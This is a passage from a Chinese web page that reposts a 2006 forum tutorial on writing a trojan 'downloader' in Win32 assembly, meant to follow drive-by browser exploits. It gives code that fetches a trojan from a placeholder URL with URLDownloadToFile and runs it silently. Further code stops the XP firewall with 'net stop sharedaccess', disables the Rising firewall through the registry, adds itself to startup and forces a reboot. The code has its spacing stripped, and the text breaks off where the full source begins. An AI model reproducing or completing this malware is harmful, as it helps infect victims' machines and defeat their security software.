【ACCESS精品源码栏目提醒】:文章导读:在新的一年中,各位网友都进入紧张的学习或是工作阶段。
网学会员整理了ACCESS精品源码-【精品文献】SCT下载者——Win32汇编语言编写 - 其它管理文献的相关内容供大家参考,祝大家在新的一年里工作和学习顺利!
原创S.C.T下载者——Win32汇编语言编写文章标题:原创S.C.T下载者——Win32汇编语言编写顶部 asm 发布于:2006-10-1914:54 楼主原创S.C.T下载者——Win32汇编语言编写 文章作者asm 信息来源邪恶八进制信息安全团队www.eviloctal.com 说明:听说插入explorer.exe可以过防火墙不过不过菜鸟自有菜方法文中关闭防火墙的办法很愚蠢但也原创: 之前牛人挂马是直接用鸽子.在弹框的那个时代谁都知道一个帮助的框就好比一个恶魔谈框色变所以人就变得聪明起来这个框还没弹出来就先把浏览器给关了.一些网马生成器利用IE某些漏洞生出来的网马要等到IE把它执行完毕的时候鸽子才能悄悄的潜伏到系统里因为那个该死的框在鸽子还没高飞的时候就被无情的扼杀.这个时候就需要一个中间的媒介利用同样的道理生产出来的网马在IE执行的时候由于这个媒介体积小所以很快就执行完毕.当然如果这个媒介就这样乖乖得好比未出门的少女那它就要遭到淘汰.它应该有在后台悄悄地下载并且执行我们预定的鸽子所以下载者就呼之欲出. 下载者顾名思义就首先要解决下载的困难下面我给出代码: Copycode include urlmon.inc includeliburlmon.lib .data szURL dburlhttp://www.baidu.com/muma.exe/url0 szSaveFiledbC:muma.exe0 szUrlmon dburlmon.dll0 invokeLoadLibraryoffsetszUrlmon invokeURLDownloadToFileNULLaddrszURLaddrszSaveFileNULLNULL 其中szURL是要下载的木马这里我用百度不是真的要从百度下载木马只是一个例子szSaveFile是下载并且保存到C盘.单单就下载一个程序那么它只是个废物还必须要自己执行这个木马我们的目的才能达到下面代码将悄悄地运行: Copycode invokeShellExecute00addrszSaveFile00SW_SHOW 现在我们已经完成了最基本的下载者特征了. 就目前而言一些防火墙开始了革命.以前防火墙只对外部的数据进行检测但是现在内部不授权的网络连接也要提示用户.从用户的角度来看这个是个聪明的创造但是养鸡的却是讨厌到了底边所以我们有必要弄死它.首先来解决XP自带的防火墙由于本人的水平半斤八两只能靠DOS命令来完成代码如下: Copycode _CloseXPproc invoke GetStartupInfoaddrstStartUp invoke CreateProcessNULLaddrszCmdLineNULLNULLNULL NORMAL_PRIORITY_CLASSNULLNULL addrstStartUpaddrstProcInfo _CloseXPendp 其中addrszCmdLine就是刷业务的人最熟悉的那个刷QQ业务的停止XP防火墙的命令netstopsharedaccess是不是有点故人相识的感觉:在调用之前首先要定义它: Copycode .data stStartUp STARTUPINFO stProcInfo PROCESS_INFORMATION 就好比打仗之前总得磨枪吧下面就轮到我们的星防火墙了首先程序会去读取它在注册表的默认位置如果没发现就下载如果发现了星防火墙的味道马上改写它键值start的数据值为4表示禁止然后复制下载者到C盘写入注册表启动重启它的机器.重启完毕会重新读取这个时候就没发现了防火墙可以大胆下载了代码: Copycode _ruixingproc LOCALhKey :DWORD LOCALBufSize:DWORD local hKeydwIndexdwLastTime:FILETIME invokeRegOpenKeyExHKEY_LOCAL_MACHINEaddrszRegKeyRfwServiceNULLKEY_QUERY_VALUEaddrhKey .if eaxERROR_SUCCESS invokeRegQueryValueExhKeyaddrszRfwServiceNULLNULLaddrszStr1addrBufSize .ifeaxERROR_SUCCESS call_Download invokeDeleteFileaddrszWin .elseifeaxERROR_SUCCESS call_CloseToo .endif .endif ret _ruixingendp 下面这段代码是重启机器 _CloseRfwServiceproc invoke GetStartupInfoaddrstStartUp invoke CreateProcessNULLaddrszShutDownNULLNULLNULL NORMAL_PRIORITY_CLASSNULLNULLaddrstStartUpaddrstProcInfo _CloseRfwServiceendp 现在我们的下载者已经完成了60再加入一些自我删除的代码完整的下载者就写出来了.下面我给出全部源代码: Copycode .386